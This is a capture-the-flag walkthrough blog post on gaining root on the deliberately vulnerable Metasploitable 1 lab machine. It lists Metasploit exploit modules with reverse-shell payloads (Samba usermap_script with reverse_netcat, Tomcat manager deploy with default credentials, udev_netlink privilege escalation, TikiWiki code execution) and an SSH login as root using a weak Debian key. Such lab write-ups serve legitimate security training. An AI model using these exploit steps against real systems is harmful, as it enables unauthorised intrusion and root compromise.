Capture the flag (CTF)

Metasploitable: 1 - walkthrough

Metasploitable: 1 surfaced on VulnHub on May 19^th, 2010. Created by Metasploit, it can be found at https://www.vulnhub.com/entry/metasploitable-1,28/. It is the first machine in the Metasploitable series. The objective is to get root privileges.

What should you learn next?

From SOC Analyst to Secure Coder to Security Manager — our team of experts has 12 free training plans to help you hit your goals. Get your free copy now.

Get Your Plan

For the attacking machine, I will be using Kali 2017.1.

Once booted, this is what the victim machine will look like:

We start the attack by finding the IP of the victim machine by using the netdiscover command:

$ netdiscover

Now that we know our target IP, let's start by scanning the ports and try to get more information about it:

The scan shows us that the following ports are open:

Port 21 - Running FTP
Port 22 - Running OpenSSH
Port 23 - Running Telnet
Port 25 - Running SMTP
Port 80 - Running Apache Web server
Port 139 - Running Samba
Port 445 - Running Samba
Port 3306 - Running MySQL
Port 5432 - Running PostgreSQL
Port 8009 - Running Apache Jserv
Port 8180 - Running Apache Tomcat

Upon visiting the web application (on port 80 via http://) we just see a default Test Page:

Looking at the source code does not reveal us anything either.

Looking back at the scan results, one particular port catches my eye, Port 445 running Samba 3.0.20. Doing some basic research, I found a vulnerability (CVE 2007-2447): http://www.cvedetails.com/cve/cve-2007-2447. Let's fire up Metasploit and see if that works:

$ use exploit/multi/samba/usermap_script

$ set PAYLOAD cmd/unix/reverse_netcat

And we are root!

Since this took no time at all, I decided to see how many more ways I could find to exploit this machine.

The next thing that caught my eye while looking back at the scan was port 8180 running Tomcat. Check that on the browser, this is what I found:

While doing some light reading, I came across the following link, https://www.rapid7.com/db/modules/exploit/multi/http/tomcat_mgr_deploy, and though of giving it a try:

$ use exploit/multi/http/tomcat_mgr_deploy

$ use payload/java/meterpreter/reverse_tcp

$ set httpusername tomcat

$ set httppassword tomcat

$ set target 0

$ set RPORT 8180

We did get a low privilege shell. Let's see how we can escalate our privilege!

While looking around, I saw that the kernel is vulnerable to the following exploit: https://www.rapid7.com/db/modules/exploit/linux/local/udev_netlink

Let's give it a shot:

$ use exploit/linux/local/udev_netlink

And we get root!

Note: Since the default credentials are tomcat: tomcat, you can log in at http://172.16.92.139:8180/admin and play around a bit as well.

Next, I thought of playing around with PostgreSQL. I tried to run a scan, and it came up with a username and password:

$ use auxiliary/scanner/postgres/postgres_login

Moving on, I wanted to do something with the web app. So, I bring my old friend, dirbuster out to real the secrets:

TWiki looks interesting. Going to the browser it shows:

Let's see if Metasploit has anything on it:

Let's start with this:

We are getting somewhere. Now let's try a remote PHP code execution exploit we saw earlier:

$ use exploit/unix/webapp/tikiwiki_graph_formula_exec

We do get a limited shell. However, it took a few attempts before the shell was spawned.

Checking its root directory shows us:

Let's see what ssh has:

Let's ssh with these credentials:

Note: You'll need to download the following keys in order to search: https://hdm.io/tools/debian-openssl/ (2048 bit RSA)

In the folder, let's search for a key:

$ grep -lr AAAAB3NzaC1yc2EAAAABIwAAAQEApmGJFZNl0ibMNALQx7M6sGGoi4KNmj6PVxpbpG70lShHQqldJkcteZZdPFSbW76IUiPR0Oh+WBV0x1c6iPL/0zUYFHyFKAz1e6/5teoweG1jr2qOffdomVhvXXvSjGaSFwwOYB8R0QxsOWWTQTYSeBa66X6e777GVkHCDLYgZSo8wWr5JXln/Tw7XotowHr8FEGvw2zW1krU3Zo9Bzp0e0ac2U+qUGIzIu/WwgztLZs5/D9IyhtRWocyQPE+kcP+Jz2mt4y1uA73KqoXfdw5oGUkxdFo9f1nu2OwkjOc+Wv8Vw7bwkf+1RgiOMgiJ5cCs4WocyVxsXovcNnbALTp3w

And now, time to get in!!

$ ssh -i 57c3115d77c56390332dc5c49978627a-5429 root@172.16.92.139

What should you learn next?

From SOC Analyst to Secure Coder to Security Manager — our team of experts has 12 free training plans to help you hit your goals. Get your free copy now.

Get Your Plan

And we are root!

Posted: May 17, 2017

Chiragh Dewan

View Profile

A creative problem-solving full-stack web developer with expertise in Information Security Audit, Web Application Audit, Vulnerability Assessment, Penetration Testing/ Ethical Hacking as well as previous experience in Artificial Intelligence, Machine Learning, and Natural Language Processing. He has also been recognised by various companies such as Facebook, Google, Microsoft, PayPal, Netflix, Blackberry, etc for reporting various security vulnerabilities. He has also given various talks on Artificial Intelligence and Cyber Security including at an TEDx event.

Metasploitable: 1 - walkthrough

Get certified and advance your career